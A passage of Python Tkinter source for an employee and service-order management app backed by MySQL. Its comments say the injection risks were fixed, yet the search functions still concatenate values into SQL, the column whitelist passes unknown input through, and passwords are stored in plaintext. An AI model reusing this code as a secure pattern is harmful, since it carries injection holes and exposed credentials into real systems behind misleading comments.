self.lbAtribuicao13['fg'] = '#4c78ff'
self.lbAtribuicao14['fg'] = '#4c78ff'
self.lbAtribuicao15['fg'] = '#4c78ff'
self.lbAtribuicao16['fg'] = '#4c78ff'
self.lbAtribuicao17['fg'] = '#4c78ff'
self.lbAtribuicao18['fg'] = '#4c78ff'
self.lbAtribuicao19['fg'] = '#4c78ff'
self.lbAtribuicao20['fg'] = '#4c78ff'
self.lbAtribuicao21['fg'] = '#4c78ff'
self.lbAtribuicao22['fg'] = '#4c78ff'
self.lbAtribuicao23['fg'] = '#4c78ff'
self.lbAtribuicao24['fg'] = '#4c78ff'
self.lbAtribuicao25['fg'] = '#4c78ff'
self.lbAtribuicao26['fg'] = '#4c78ff'
self.lbAtribuicao27['fg'] = '#4c78ff'
self.lbAtribuicao28['fg'] = '#4c78ff'
self.lbAtribuicao29['fg'] = '#4c78ff'
self.lbAtribuicao30['fg'] = '#4c78ff'
self.lbAtribuicao31['fg'] = '#4c78ff'
self.lbAtribuicao32['fg'] = '#4c78ff'
self.lbAtribuicao33['fg'] = '#4c78ff'
self.lbAtribuicao34['fg'] = '#4c78ff'
self.lbAtribuicao35['fg'] = '#4c78ff'
self.lbAtribuicao36['fg'] = '#4c78ff'
self.lbAtribuicao37['fg'] = '#4c78ff'
self.lbAtribuicao38['fg'] = '#4c78ff'
self.lbAtribuicao39['fg'] = '#4c78ff'
self.lbAtribuicao40['fg'] = '#4c78ff'
if a == '':
self.campoNome['bg'] = 'pink'
self.lbNome['fg'] = 'red'
if b == '':
self.campoCPF['bg'] = 'pink'
self.lbCPF['fg'] = 'red'
if c == '':
self.campoSenha['bg'] = 'pink'
self.lbSenha['fg'] = 'red'
if d == '':
self.campoConfirmaSenha['bg'] = 'pink'
self.lbConfirmaSenha['fg'] = 'red'
if e == 'Selecione':
self.lbFuncao['fg'] = 'red'
if f == '':
self.campoFone['bg'] = 'pink'
self.lbFone['fg'] = 'red'
if g == '':
self.campoNasc['bg'] = 'pink'
self.lbNasc['fg'] = 'red'
if self.box1.get() == '' or int(self.box1.get()) > 4:
self.lbAtribuicao1['fg'] = 'red'
if self.box2.get() == '' or int(self.box2.get()) > 4:
self.lbAtribuicao2['fg'] = 'red'
if self.box3.get() == '' or int(self.box3.get()) > 4:
self.lbAtribuicao3['fg'] = 'red'
if self.box4.get() == '' or int(self.box4.get()) > 4:
self.lbAtribuicao4['fg'] = 'red'
if self.box5.get() == '' or int(self.box5.get()) > 4:
self.lbAtribuicao5['fg'] = 'red'
if self.box6.get() == '' or int(self.box6.get()) > 4:
self.lbAtribuicao6['fg'] = 'red'
if self.box7.get() == '' or int(self.box7.get()) > 4:
self.lbAtribuicao7['fg'] = 'red'
if self.box8.get() == '' or int(self.box8.get()) > 4:
self.lbAtribuicao8['fg'] = 'red'
if self.box9.get() == '' or int(self.box9.get()) > 4:
self.lbAtribuicao9['fg'] = 'red'
if self.box10.get() == '' or int(self.box10.get()) > 4:
self.lbAtribuicao10['fg'] = 'red'
if self.box11.get() == '' or int(self.box11.get()) > 4:
self.lbAtribuicao11['fg'] = 'red'
if self.box12.get() == '' or int(self.box12.get()) > 4:
self.lbAtribuicao12['fg'] = 'red'
if self.box13.get() == '' or int(self.box13.get()) > 4:
self.lbAtribuicao13['fg'] = 'red'
if self.box14.get() == '' or int(self.box14.get()) > 4:
self.lbAtribuicao14['fg'] = 'red'
if self.box15.get() == '' or int(self.box15.get()) > 4:
self.lbAtribuicao15['fg'] = 'red'
if self.box16.get() == '' or int(self.box16.get()) > 4:
self.lbAtribuicao16['fg'] = 'red'
if self.box17.get() == '' or int(self.box17.get()) > 4:
self.lbAtribuicao17['fg'] = 'red'
if self.box18.get() == '' or int(self.box18.get()) > 4:
self.lbAtribuicao18['fg'] = 'red'
if self.box19.get() == '' or int(self.box19.get()) > 4:
self.lbAtribuicao19['fg'] = 'red'
if self.box20.get() == '' or int(self.box20.get()) > 4:
self.lbAtribuicao20['fg'] = 'red'
if self.box21.get() == '' or int(self.box21.get()) > 4:
self.lbAtribuicao21['fg'] = 'red'
if self.box22.get() == '' or int(self.box22.get()) > 4:
self.lbAtribuicao22['fg'] = 'red'
if self.box23.get() == '' or int(self.box23.get()) > 4:
self.lbAtribuicao23['fg'] = 'red'
if self.box24.get() == '' or int(self.box24.get()) > 4:
self.lbAtribuicao24['fg'] = 'red'
if self.box25.get() == '' or int(self.box25.get()) > 4:
self.lbAtribuicao25['fg'] = 'red'
if self.box26.get() == '' or int(self.box26.get()) > 4:
self.lbAtribuicao26['fg'] = 'red'
if self.box27.get() == '' or int(self.box27.get()) > 4:
self.lbAtribuicao27['fg'] = 'red'
if self.box28.get() == '' or int(self.box28.get()) > 4:
self.lbAtribuicao28['fg'] = 'red'
if self.box29.get() == '' or int(self.box29.get()) > 4:
self.lbAtribuicao29['fg'] = 'red'
if self.box30.get() == '' or int(self.box30.get()) > 4:
self.lbAtribuicao30['fg'] = 'red'
if self.box31.get() == '' or int(self.box31.get()) > 4:
self.lbAtribuicao31['fg'] = 'red'
if self.box32.get() == '' or int(self.box32.get()) > 4:
self.lbAtribuicao32['fg'] = 'red'
if self.box33.get() == '' or int(self.box33.get()) > 4:
self.lbAtribuicao33['fg'] = 'red'
if self.box34.get() == '' or int(self.box34.get()) > 4:
self.lbAtribuicao34['fg'] = 'red'
if self.box35.get() == '' or int(self.box35.get()) > 4:
self.lbAtribuicao35['fg'] = 'red'
if self.box36.get() == '' or int(self.box36.get()) > 4:
self.lbAtribuicao36['fg'] = 'red'
if self.box37.get() == '' or int(self.box37.get()) > 4:
self.lbAtribuicao37['fg'] = 'red'
if self.box38.get() == '' or int(self.box38.get()) > 4:
self.lbAtribuicao38['fg'] = 'red'
if self.box39.get() == '' or int(self.box39.get()) > 4:
self.lbAtribuicao39['fg'] = 'red'
if self.box40.get() == '' or int(self.box40.get()) > 4:
self.lbAtribuicao40['fg'] = 'red'
if self.box41.get() == '' or int(self.box41.get()) > 4:
self.lbAtribuicao41['fg'] = 'red'
return messagebox.showerror('Alerta', 'Verifique os campos')
elif len(a) < 6 or len(b) < 11 or len(c) < 8 or len(d) < 8 or c != d:
#Mudando cor para preto caso o usuário tenha errado em algum campo e tenha corrigdo
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
if len(a) < 6:
self.campoNome['bg'] = 'pink'
self.lbNome['fg'] = 'red'
if len(b) < 11:
self.campoCPF['bg'] = 'pink'
self.lbCPF['fg'] = 'red'
if len(c) < 8:
self.campoSenha['bg'] = 'pink'
self.lbSenha['fg'] = 'red'
if len(d) < 8:
self.campoConfirmaSenha['bg'] = 'pink'
self.lbConfirmaSenha['fg'] = 'red'
return messagebox.showerror('Alerta', 'Verifique os campos')
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
self.lbAtribuicao1['fg'] = '#4c78ff'
self.lbAtribuicao2['fg'] = '#4c78ff'
self.lbAtribuicao3['fg'] = '#4c78ff'
self.lbAtribuicao4['fg'] = '#4c78ff'
self.lbAtribuicao5['fg'] = '#4c78ff'
self.lbAtribuicao6['fg'] = '#4c78ff'
self.lbAtribuicao7['fg'] = '#4c78ff'
self.lbAtribuicao8['fg'] = '#4c78ff'
self.lbAtribuicao9['fg'] = '#4c78ff'
self.lbAtribuicao10['fg'] = '#4c78ff'
self.lbAtribuicao11['fg'] = '#4c78ff'
self.lbAtribuicao12['fg'] = '#4c78ff'
self.lbAtribuicao13['fg'] = '#4c78ff'
self.lbAtribuicao14['fg'] = '#4c78ff'
self.lbAtribuicao15['fg'] = '#4c78ff'
self.lbAtribuicao16['fg'] = '#4c78ff'
self.lbAtribuicao17['fg'] = '#4c78ff'
self.lbAtribuicao18['fg'] = '#4c78ff'
self.lbAtribuicao19['fg'] = '#4c78ff'
self.lbAtribuicao20['fg'] = '#4c78ff'
self.lbAtribuicao21['fg'] = '#4c78ff'
self.lbAtribuicao22['fg'] = '#4c78ff'
self.lbAtribuicao23['fg'] = '#4c78ff'
self.lbAtribuicao24['fg'] = '#4c78ff'
self.lbAtribuicao25['fg'] = '#4c78ff'
self.lbAtribuicao26['fg'] = '#4c78ff'
self.lbAtribuicao27['fg'] = '#4c78ff'
self.lbAtribuicao28['fg'] = '#4c78ff'
self.lbAtribuicao29['fg'] = '#4c78ff'
self.lbAtribuicao30['fg'] = '#4c78ff'
self.lbAtribuicao31['fg'] = '#4c78ff'
self.lbAtribuicao32['fg'] = '#4c78ff'
self.lbAtribuicao33['fg'] = '#4c78ff'
self.lbAtribuicao34['fg'] = '#4c78ff'
self.lbAtribuicao35['fg'] = '#4c78ff'
self.lbAtribuicao36['fg'] = '#4c78ff'
self.lbAtribuicao37['fg'] = '#4c78ff'
self.lbAtribuicao38['fg'] = '#4c78ff'
self.lbAtribuicao39['fg'] = '#4c78ff'
self.lbAtribuicao40['fg'] = '#4c78ff'
cont1 = 0
cont2 = 0
#Verificando se o campo de telefone foi digitado corretamente
for caracter in f:
if caracter.isnumeric():
cont1 +=1
elif not caracter.isnumeric():
cont2 +=1
if cont1 != 11 or cont2 != 4:
self.lbFone['fg'] = 'red'
self.campoFone['bg'] = 'pink'
return messagebox.showerror('Alerta', 'Verifique os campos')
else:
self.lbFone['fg'] = '#4c78ff'
self.campoFone['bg'] = 'white'
cont1 = 0
cont2 = 0
#Verificando se o campo de data de nascimento foi digitado corretamente
for caracter in g:
if caracter.isnumeric():
cont1 +=1
elif not caracter.isnumeric():
cont2 +=1
if cont1 != 8 or cont2 != 2:
self.lbNasc['fg'] = 'red'
self.campoNasc['bg'] = 'pink'
return messagebox.showerror('Alerta', 'Verifique os campos')
else:
self.lbNasc['fg'] = '#4c78ff'
self.campoNasc['bg'] = 'white'
try:
if self.bancoServer.is_connected():
#Após a verificação invocará a função de cadastramento
if parametro == 'cadastrar':
self.inserindo_dados_cadastro()
#Após a verificação invocará a função para alteraçãod e registro
elif parametro == 'alterar':
self.alterar_dados_funcionarios()
except:
messagebox.showerror('Alerta', 'Erro conexão com Banco de Dados não estabelecida')
def inserindo_dados_cadastro(self):
    """Insert a new employee (personal data, photo BLOB, 41 skill levels) into the DB.

    Reactivates the record instead when the CPF exists but is flagged inactive,
    and refuses the insert when the CPF is already registered.
    """
    # Read the chosen profile picture as raw bytes for the Foto BLOB column
    with open(self.arquivoIMG, 'rb') as arquivoBinary:
        self.imageBinary = arquivoBinary.read()
    cpf = self.campoCPF.get()
    try:
        # Parameterized query — the old code concatenated the CPF straight
        # into the SQL string (injection risk).
        self.cursor.execute(
            "select count(CPF) from funcionarios where CPF = %s and Membro = 'inativo'",
            (cpf,))
        verificaCPF = self.cursor.fetchall()[0][0]
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        return messagebox.showerror('Alerta', 'Erro ao realizar consulta com MySQL. Verifique a conexão com o banco')
    if verificaCPF == 1:
        # CPF exists but is inactive: offer reactivation instead of a new insert
        if messagebox.askyesno('Alerta', 'O CPF: '+cpf+' está inativo. Deseja reativá-lo novamente?'):
            self.cursor.execute("update funcionarios set Membro = 'ativo' where CPF = %s", (cpf,))
            return messagebox.showinfo('Alerta', 'Usuário reativado com sucesso!')
        else: return ''
    try:
        # Reject duplicates (active records)
        self.cursor.execute("select count(CPF) from funcionarios where CPF = %s", (cpf,))
        verificaCPF = self.cursor.fetchall()[0][0]
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        return messagebox.showerror('Alerta', 'Erro ao realizar consulta com MySQL. Verifique a conexão com o banco')
    if verificaCPF == 1:
        return messagebox.showwarning('Alerta', 'O CPF - '+cpf+', já possui cadastro')
    # Collect the registration form fields
    a = self.campoNome.get().title()
    b = cpf
    c = self.campoConfirmaSenha.get()
    e = self.campoFuncao.get()
    f = self.campoFone.get()
    g = self.campoNasc.get()
    tp1 = "INSERT INTO funcionarios (ID, Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
    tp2 = ('id', a, b, c, e, f, g, self.imageBinary)
    try:
        self.cursor.execute(tp1, tp2)
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        return messagebox.showerror('Alerta', 'Erro ao inserir dados. Verifique a conexão com o banco')
    # Skill levels come from the 41 selection boxes self.box1 .. self.box41
    listaNivel = [getattr(self, f'box{i}').get() for i in range(1, 42)]
    self.cursor.execute("select id from funcionarios where CPF = %s", (b,))
    idOperador = self.cursor.fetchall()[0][0]
    self.cursor.execute("select count(id) from operacao")
    operacoesTotal = self.cursor.fetchall()[0][0]
    try:
        # One competencia row per operation; idOperacao is 1-based in the DB
        for idOperacao in range(operacoesTotal):
            nivel = listaNivel[idOperacao]
            self.cursor.execute(
                "INSERT INTO competencia (id, idOperador, idOperacao, Nivel) VALUES (DEFAULT, %s, %s, %s)",
                (str(idOperador), str(idOperacao + 1), nivel))
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
    self.atualiza_valores_funcionario()
    # Refresh the Treeview with the freshly registered employee
    self.exibir_funcionarios('cadastro')
    if messagebox.showinfo('Alerta', 'Usuário cadastrado com sucesso!'):
        self.limpar_aba_cadastrar('fim_cadastro')
def exibir_funcionarios(self, insert):
    """Populate the employees Treeview.

    insert == 'funcionarios': list every active employee.
    insert == 'cadastro':     append only the most recently registered one.
    Any DB failure is swallowed on purpose (best-effort UI refresh).
    """
    self.listaFuncionario = []
    consultas = {
        'funcionarios': "select id, Nome, Funcao, CPF from funcionarios where Membro = 'ativo'",
        'cadastro': "select id, Nome, Funcao, CPF from funcionarios where Membro = 'ativo' order by id desc limit 1",
    }
    try:
        if self.bancoServer.is_connected() and insert in consultas:
            self.cursor.execute(consultas[insert])
            for idd, nome, funcao, CPF in self.cursor.fetchall():
                self.viewFuncionarios.insert("", "end", values=(idd, nome.title(), funcao, CPF))
    except Exception:
        # Deliberate best-effort: keep the UI alive if the server is down
        pass
def exibir_perfil_funcionarios(self, event):
    """Show the profile panel (photo, age, phone, OS counters) for the selected row."""
    # Selected Treeview row -> employee id
    selecionada = self.viewFuncionarios.selection()[0]
    x = self.viewFuncionarios.item(selecionada, "values")
    i_d = x[0]
    try:
        # Parameterized — the old code concatenated the id into the SQL string
        self.cursor.execute(
            "select id, Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto from funcionarios where id = %s",
            (i_d,))
        valido = self.cursor.fetchall()
    except Exception:
        return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
    # Hide the "select an employee" hint
    self.labelAviso.place_forget()
    for valor in valido:
        idd, nome, CPF, senha, funcao, telefone, dataNasc, foto = valor
        # Age from the birth year; assumes Data_Nasc is DD/MM/YYYY (year at
        # offset 6) — TODO confirm against the registration form format
        v1 = int(dataNasc[6:])
        v2 = int(datetime.now().date().strftime('%Y'))
        idade = v2 - v1
        self.lNome['text'] = nome
        self.lIdade['text'] = str(idade)+' anos'
        self.lFone['text'] = telefone
        caminho = "FotoPerfil.png"
        # Dump the photo BLOB to disk so Tk's PhotoImage can load it
        with open(caminho, 'wb') as fotoConvertida:
            fotoConvertida.write(foto)
        self.abrirFoto = PhotoImage(file=caminho)
        self.lbPerfil['image'] = self.abrirFoto
        try:
            # Completed OS count and currently-paused OS count for this CPF
            self.cursor.execute("select OS from concluidas where CPF = %s", (str(CPF),))
            valido = self.cursor.fetchall()
            self.l_OS_Dados1['text'] = len(valido)
            self.cursor.execute(
                "select OS from pausas where CPF = %s and DataRetomada = 'none'",
                (str(CPF),))
            valido = self.cursor.fetchall()
            self.l_OS_Dados2['text'] = len(valido)
        except Exception:
            return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
        # Lay out the profile widgets
        self.botVer.place(relx=0.300, rely=0.800)
        self.lNome.place(relx=0, rely=0.350, relwidth=1)
        self.lIdade.place(relx=0, rely=0.400, relwidth=1)
        self.lFone.place(relx=0, rely=0.450, relwidth=1)
        self.l_OS_Con.place(relx=0.010, rely=0.540)
        self.l_OS_Pen.place(relx=0.010, rely=0.590)
        self.l_OS_Dados1.place(relx=0.410, rely=0.540)
        self.l_OS_Dados2.place(relx=0.410, rely=0.590)
def limpar_perfil_funcionario(self):
    """Reset the profile panel: restore the placeholder image, hide the
    detail labels and show the 'select an employee' hint again."""
    self.lbPerfil['image'] = self.imgPerfil
    for rotulo in (self.lNome, self.lIdade, self.lFone,
                   self.l_OS_Con, self.l_OS_Pen,
                   self.l_OS_Dados1, self.l_OS_Dados2):
        rotulo.place_forget()
    self.labelAviso.place(relx=0.150, rely=0.400)
def deletar_perfil_funcionario(self):
    """Soft-delete the selected employee after confirmation.

    The record is flagged Membro='inativo' rather than removed, so history
    (OS, competencia rows) is preserved and the CPF can be reactivated later.
    """
    try:
        selecionada = self.viewFuncionarios.selection()[0]
        x = self.viewFuncionarios.item(selecionada, "values")
    except Exception:
        # Nothing selected in the Treeview
        return ''
    if messagebox.askyesno('Remover Funcionário', 'Deseja realmente excluir este usuário?'):
        cpf = x[3]
        try:
            # Parameterized — the old code concatenated the CPF into the SQL
            self.cursor.execute("update funcionarios set Membro = 'inativo' where CPF = %s", (cpf,))
            messagebox.showinfo('Ação Concluída', 'Ação concluída com sucesso')
            self.viewFuncionarios.delete(selecionada)
            self.limpar_perfil_funcionario()
            self.atualiza_valores_funcionario()
        except Exception:
            messagebox.showerror('Erro', 'Erro ao tentar fazer operação')
def editar_perfil_funcionario(self):
    """Load the selected employee into the registration tab for editing.

    Fills the personal-data fields, selects the stored job title, loads the
    41 skill boxes from competencia, shows the stored photo and swaps the
    Confirm button for Alter/Cancel buttons.
    """
    try:
        selecionada = self.viewFuncionarios.selection()[0]
        x = self.viewFuncionarios.item(selecionada, "values")
        i_d = x[0]
        CPF = x[3]
    except Exception:
        # Nothing selected
        return ''
    try:
        # Parameterized — the old code interpolated the id into the SQL string
        self.cursor.execute(
            "select Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto from funcionarios where id = %s",
            (i_d,))
        valido = self.cursor.fetchall()
        self.abas.select(self.aba3)
    except Exception:
        return messagebox.showerror('Sem Conexão', 'Sem Conexão com o Banco de Dados')
    # Remember which record is being edited (used by alterar_dados_funcionarios)
    self.cpf_funcionario = str(valido[0][1])
    self.id_funcionario = i_d
    # Clear and refill the personal-data fields
    for campo in (self.campoNome, self.campoCPF, self.campoConfirmaSenha,
                  self.campoSenha, self.campoFone, self.campoNasc):
        campo.delete(0, END)
    self.campoNome.insert(END, valido[0][0])
    self.campoCPF.insert(END, valido[0][1])
    self.campoSenha.insert(END, valido[0][2])
    self.campoConfirmaSenha.insert(END, valido[0][2])
    self.campoFone.insert(END, valido[0][4])
    self.campoNasc.insert(END, valido[0][5])
    # Select the stored job title in the combobox
    a = self.campoFuncao['values']
    b = valido[0][3]
    for c in range(len(a)):
        if a[c] == b:
            self.campoFuncao.current(c)
    try:
        self.cursor.execute("select Nivel from competencia where idOperador = %s", (i_d,))
        valido = self.cursor.fetchall()
    except Exception as erro:
        print(f'errou 1 {erro}, {(erro.__class__)}')
        return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
    try:
        # The 41 skill boxes self.box1..self.box41 mirror the competencia
        # rows in order: clear them all first, then fill from the result set
        for i in range(1, 42):
            getattr(self, f'box{i}').delete(0, END)
        for i in range(1, 42):
            getattr(self, f'box{i}').insert(END, valido[i - 1][0])
    except Exception:
        print('errou aqui')
    # Show the stored photo in the form and switch the icon to "edit"
    self.arquivoIMG = "FotoPerfil.png"
    self.cookie = PhotoImage(file="FotoPerfil.png")
    self.foto['image'] = self.cookie
    self.imgAdd = PhotoImage(file='image/lapis.png')
    self.add['image'] = self.imgAdd
    self.add.place(relx=0.955, rely=0.700)
    # Cancel button aborts the edit session
    self.imgCancelar = PhotoImage(file='image/cancelar.png')
    self.botCancelar = Button(self.aba3, image=self.imgCancelar, bg='white', activebackground='white', border=0, command=lambda:self.limpar_aba_cadastrar('fim_alteração'))
    self.botCancelar.place(relx=0.72, rely=0.90)
    # Replace Confirm with Alter for the duration of the edit
    self.botaoConfirmar.place_forget()
    self.imgAlterar = PhotoImage(file='image/Alterar.png')
    self.botAlterar = Button(self.aba3, image=self.imgAlterar, bg='white', activebackground='white', border=0, command=lambda:self.verificar_campos_cadastro('alterar'))
    self.botAlterar.place(relx=0.82, rely=0.90)
def limpar_aba_cadastrar(self, parametro):
    """Reset the registration tab to its pristine state.

    Clears all entry fields, resets the 41 skill boxes to '0', restores the
    "no profile picture" placeholder, and — when parametro == 'fim_alteração'
    — removes the Alter/Cancel buttons and restores the Confirm button.
    """
    self.campoNome.delete(0, END)
    self.campoNome.focus_force()
    for campo in (self.campoCPF, self.campoConfirmaSenha, self.campoSenha,
                  self.campoFone, self.campoNasc):
        campo.delete(0, END)
    self.campoFuncao.current(0)
    # Reset the 41 skill boxes to their default value '0'
    for i in range(1, 42):
        box = getattr(self, f'box{i}')
        box.delete(0, END)
        box.insert(END, '0')
    # Restore the "no profile picture" placeholder and the "open" icon
    self.foto['image'] = self.imgSemPerfil
    self.arquivoIMG = 'image/sem_perfil.png'
    self.imgAdd = PhotoImage(file='image/abrir.png')
    self.add['image'] = self.imgAdd
    self.add.place(relx=0.890, rely=0.580)
    if parametro == 'fim_alteração':
        # Leaving an edit session: drop Alter/Cancel, bring Confirm back
        self.botCancelar.destroy()
        self.botAlterar.destroy()
        self.botaoConfirmar.place(relx=0.82, rely=0.90)
def alterar_dados_funcionarios(self):
    """Persist the edits made in the registration tab to the employee being edited.

    Relies on self.id_funcionario / self.cpf_funcionario set by
    editar_perfil_funcionario. Updates personal data, the 41 competencia
    levels, the photo BLOB, then rebuilds the employees Treeview.
    """
    a = self.campoNome.get()
    b = self.campoCPF.get()
    c = self.campoSenha.get()
    d = self.campoConfirmaSenha.get()  # read for form parity; not persisted
    e = self.campoFuncao.get()
    f = self.campoFone.get()
    g = self.campoNasc.get()
    # The (possibly changed) CPF must not belong to another employee
    try:
        self.cursor.execute(
            "select CPF from funcionarios where CPF = %s and id <> %s",
            (b, self.id_funcionario))
        valido = self.cursor.fetchall()
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        if messagebox.showerror('Alerta', 'Erro ao realizar busca no Banco de Dados'):
            return ''
    if len(valido) == 1:
        return messagebox.showinfo('Alerta', 'O CPF - '+self.campoCPF.get()+', pertence a outro funcionario')
    # Skill levels from the 41 selection boxes self.box1 .. self.box41
    listaNivel = [getattr(self, 'box{}'.format(i)).get() for i in range(1, 42)]
    try:
        # Parameterized UPDATE — the old code interpolated every form field
        # straight into the SQL string (injection risk)
        self.cursor.execute(
            "UPDATE funcionarios SET Nome=%s, CPF=%s, Senha=%s, Funcao=%s, Telefone=%s, Data_Nasc=%s where CPF = %s",
            (a, b, c, e, f, g, self.cpf_funcionario))
        # competencia rows map one-to-one, in order, onto the 41 boxes
        self.cursor.execute("select id from competencia where idOperador = %s", (self.id_funcionario,))
        listaId = self.cursor.fetchall()
        for n in range(len(listaNivel)):
            self.cursor.execute(
                "UPDATE competencia SET Nivel = %s where id = %s",
                (listaNivel[n], str(listaId[n][0])))
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        if messagebox.showerror('Alerta', 'Erro ao atualizar dados'):
            return ''
    # Re-encode the (possibly replaced) profile picture
    with open(self.arquivoIMG, 'rb') as arquivoBinary:
        self.imageBinary = arquivoBinary.read()
    valores = (self.imageBinary, self.cpf_funcionario)
    try:
        self.cursor.execute("UPDATE funcionarios SET Foto = (%s) WHERE CPF = (%s)", valores)
        # Rebuild the Treeview from scratch with the updated data
        self.viewFuncionarios.delete(*self.viewFuncionarios.get_children())
        self.cursor.execute('select id, Nome, Funcao, CPF from funcionarios')
        valido = self.cursor.fetchall()
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        if messagebox.showerror('Alerta', 'Erro ao realizar atualização e busca no Banco de Dados'):
            return ''
    for idd, nome, funcao, CPF in valido:
        self.viewFuncionarios.insert("", "end", values=(idd, nome, funcao, CPF))
    if messagebox.showinfo("Alteração Concluida", "Dados alterado com sucesso!"):
        self.limpar_aba_cadastrar('fim_alteração')
def atualiza_valores_funcionario(self):
    """Refresh the active-employee counter label (self.lbFunc) from the DB."""
    # COUNT(*) lets the server count; the old code fetched every full row
    # just to take len() of the result
    self.cursor.execute("select count(*) from funcionarios where Membro = 'ativo'")
    self.nFunc = self.cursor.fetchall()[0][0]
    self.lbFunc['text'] = str(self.nFunc)
def buscar(self, args):
    """Filter the completed-OS Treeview by type and an optional free-text search.

    args is the Tk event object (unused). Shows a "no records" label when
    the query returns nothing.
    """
    tipo = self.boxTipo.get()
    pesquisa = self.boxPesquisar.get()
    campo = self.campoBusca.get().capitalize()
    # Rebuild the Treeview from scratch
    self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
    # Map the UI label onto the value stored in the database
    if tipo == 'Retrabalho OS':
        tipo = 'Retrabalhar OS'
    if tipo != 'Tudo':
        tipo = "Tipo = '"+tipo+"'"
    else:
        tipo = "Tipo IN ('Nova OS', 'Retrabalhar OS')"
    # Whitelist mapping UI search options to column names (column names
    # cannot be bound as parameters, so they must come from this dict)
    colunas = {'Nome': 'Operador', 'CPF': 'CPF',
               'Nº Peça': 'CodigoPeca', 'Nº Operação': 'CodigoOperacao'}
    pesquisa = colunas.get(pesquisa, pesquisa)
    try:
        if campo == '':
            self.cursor.execute("select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where "+tipo+" and OS = "+self.pegarOS)
        else:
            # Only the user-typed search value is parameterized
            self.cursor.execute(
                "select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where "+tipo+" and OS = "+self.pegarOS+" and "+pesquisa+" like %s",
                ('%'+campo+'%',))
        valido = self.cursor.fetchall()
        if len(valido) == 0:
            self.labelerro['text'] = 'Nenhum Registro Encontrado'
            self.labelerro.place(relx=0.430, rely=0.500)
            return 0
        else:
            self.labelerro.place_forget()
        # Column order of the SELECT matches the Treeview columns
        for linha in valido:
            self.viewOrdemServico.insert("", "end", values=linha)
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
def buscar2(self, args):
    """Filter the paused-OS Treeview by an optional free-text search.

    args is the Tk event object (unused). An empty result with an empty
    search shows the "0 pauses" label; an empty filtered result shows the
    "no records found" label.
    """
    # Hide the "no pauses" label until we know the result is empty
    self.lbl.place_forget()
    pesquisa = self.boxPesquisar2.get()
    campo = self.campoBusca2.get().capitalize()
    self.viewPausas.delete(*self.viewPausas.get_children())
    # Whitelist mapping UI search options to column names
    colunas = {'Nome': 'Operador', 'CPF': 'CPF'}
    pesquisa = colunas.get(pesquisa, pesquisa)
    try:
        if campo == '':
            self.cursor.execute("select ID, Operador, MotivoPause, Tipo, Maquina from pausas where OS = "+self.pegarOS)
            valido = self.cursor.fetchall()
            if len(valido) == 0:
                self.labelerro2.place_forget()
                self.lbl.place(relx=0.500, rely=0.500, anchor='center')
                return 0
        else:
            # Only the user-typed search value is parameterized; the column
            # name comes from the whitelist above
            self.cursor.execute(
                "select ID, Operador, MotivoPause, Tipo, Maquina from pausas where OS = "+self.pegarOS+" and "+pesquisa+" like %s",
                ('%'+campo+'%',))
            valido = self.cursor.fetchall()
            if len(valido) == 0:
                self.labelerro2['text'] = 'Nenhum Registro Encontrado'
                self.labelerro2.place(relx=0.500, rely=0.500, anchor='center')
                return 0
            else:
                self.labelerro2.place_forget()
        for linha in valido:
            self.viewPausas.insert("", "end", values=linha)
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
def exibir_info_tempo_horas(self, args):
    """Show the time statistics of the OS row selected in the Treeview.

    args is the Tk event object (unused). The extra-time row is shown only
    when TempGastoExt differs from '0:00:00'.
    """
    try:
        selecionada = self.viewOrdemServico.selection()[0]
        idd = self.viewOrdemServico.item(selecionada, "values")
        self.lblSemInformacao.place_forget()
    except Exception:
        # Nothing selected
        return ''
    # Parameterized — the old code interpolated the row id into the SQL
    self.cursor.execute(
        "select TempProgramado, TempOperando, TempGasto, TempGastoExt from concluidas where id = %s",
        (idd[0],))
    valido = self.cursor.fetchall()
    rotulos = (self.dadosTempoProgramado, self.dadosTempoOperando,
               self.dadosTempoGasto, self.dadosTempoExtra)
    # Fall back to zeroed times when the row has no record
    tempos = valido[0] if valido else ('0:00:00',) * 4
    for rotulo, tempo in zip(rotulos, tempos):
        rotulo['text'] = tempo
        rotulo['font'] = ('arial', 13)
    # Header labels
    self.lb1.place(relx=0.010, rely=0.150)
    self.lb2.place(relx=0.010, rely=0.350)
    self.lb3.place(relx=0.010, rely=0.550)
    # Check-mark icons
    self.img1.place(relx=0.740, rely=0.150)
    self.img2.place(relx=0.800, rely=0.350)
    self.img3.place(relx=0.620, rely=0.550)
    # Value labels
    self.dadosTempoProgramado.place(relx=0.300, rely=0.250)
    self.dadosTempoOperando.place(relx=0.300, rely=0.450)
    self.dadosTempoGasto.place(relx=0.300, rely=0.650)
    # Extra-time row only when extra time was actually logged
    try:
        if str(valido[0][3]) != '0:00:00':
            self.lb4.place(relx=0.010, rely=0.750)
            self.img4.place(relx=0.600, rely=0.750)
            self.dadosTempoExtra.place(relx=0.300, rely=0.850)
        else:
            self.lb4.place_forget()
